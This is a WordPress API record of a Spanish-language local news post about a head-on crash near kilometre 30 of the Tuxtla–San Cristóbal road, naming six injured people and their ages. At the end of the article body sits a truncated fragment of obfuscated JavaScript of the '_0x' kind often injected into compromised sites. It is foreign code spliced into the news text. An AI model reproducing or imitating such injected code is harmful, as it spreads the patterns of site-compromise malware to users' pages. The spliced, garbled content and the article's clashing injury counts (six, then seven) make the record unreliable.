{"id":10821,"date":"2023-07-03T03:19:45","date_gmt":"2023-07-03T03:19:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10821"},"modified":"2023-07-03T03:19:45","modified_gmt":"2023-07-03T03:19:45","slug":"al-menos-seis-heridos-deja-fuerte-accidente-en-el-tramo-tuxtla-san-cristobal-de-las-casas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10821","title":{"rendered":"Al menos seis heridos deja fuerte accidente en el tramo Tuxtla-San Crist\u00f3bal de Las Casas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688354329507-768x1024.jpg\" alt=\"\" class=\"wp-image-10822\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688354329507-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688354329507-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688354329507.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 2 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un choque entre una unidad del Servicio P\u00fablico que cubre la ruta Tuxtla-San Crist\u00f3bal y viceversa y un autom\u00f3vil particular protagonizaron un fuerte accidente de tr\u00e1nsito este domingo por la tarde, dejando por lo menos seis heridos de gravedad.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 a la altura del kil\u00f3metro 30 cuando la Hiace Toyota de color gris se impact\u00f3 de frente contra un Chevrolet Optra de color gris.<\/p>\n\n\n\n<p>Por el fuerte impacto al menos siete personas resultaron heridas, el chofer del particular fue el m\u00e1s grave.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que, lo heridos fueron identificados como Christian de Jes\u00fas Morales de 32 a\u00f1os, Gerardo de Jes\u00fas Interiano de 58 a\u00f1os, Agelina S\u00e1nchez de 26 a\u00f1os de edad, Jos\u00e9 Antonio Guill\u00e9n de 51 a\u00f1os de edad, Rosa V\u00e1zquez M\u00e9ndez de 37 a\u00f1os y Angelina S\u00e1nchez Hern\u00e1ndez de 26 a\u00f1os de edad.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil y Cruz Roja de San Crist\u00f3bal de Las Casas.<\/p>\n\n\n\n<p>Los heridos fueron trasladados al Hospital de Las Culturas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 2 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un choque entre una unidad del Servicio P\u00fablico que cubre la ruta Tuxtla-San Crist\u00f3bal y viceversa y un autom\u00f3vil particular protagonizaron un fuerte accidente de tr\u00e1nsito este domingo por la tarde, dejando por lo menos seis heridos de gravedad. De acuerdo con los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10822,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10821","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10821","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10821"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10821\/revisions"}],"predecessor-version":[{"id":10823,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10821\/revisions\/10823"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10822"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10821"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10821"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}